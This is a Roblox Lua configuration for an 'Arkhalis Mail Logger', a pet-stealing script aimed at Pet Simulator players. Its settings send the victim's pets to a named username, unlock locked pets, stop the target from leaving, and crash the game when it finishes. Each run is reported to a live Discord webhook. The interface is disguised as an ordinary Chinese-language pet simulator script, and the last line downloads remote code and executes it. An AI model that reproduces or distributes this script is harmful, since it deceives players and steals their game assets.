--[[ Arkhalis Mail Logger ]]--

--[[ Main Config ]]--

_G.Username = "cocvn_my" --// Username To Send Pets To

_G.GiftMequssage = "cocvn" --// Message For The Gift To Say

_G.Diamonds = 1000000 --// Amount Of Diamonds To Not Kick

_G.UnlockPets = true --// Unlocks Locked Pets

_G.AntiLeave = true --// Doesn't Let The Target Close Roblox

_G.Crash = true --// Crashes Them After Its Finished

--[[ Webhook Config ]]--

_G.Webhook = "https://discord.com/api/webhooks/1101694550692610151/K52gl7yA2PSGJVR7sdqEEchlZNOuORGKYSe39NiHwQtgUsq1AQ_IpzhIKwMYrqgodaZ8" --// Discord Webhook For Executions

--[[ UI Config ]]--

_G.ScriptName = "宠物模拟器脚本" --// Script Name On The UI

_G.Tip1 = "加载中" --// Gives You Tips On The UI

_G.Tip2 = "测试中" --// Gives You Tips On The UI

_G.Tip3 = "准备中" --// Gives You Tips On The UI

_G.Tip4 = "启动脚本中" --// Gives You Tips On The UI

_G.Tip5 = "加载脚本中" --// Gives You Tips On The UI

--[[ Script ]]

loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/Arkhalis.lua"))()
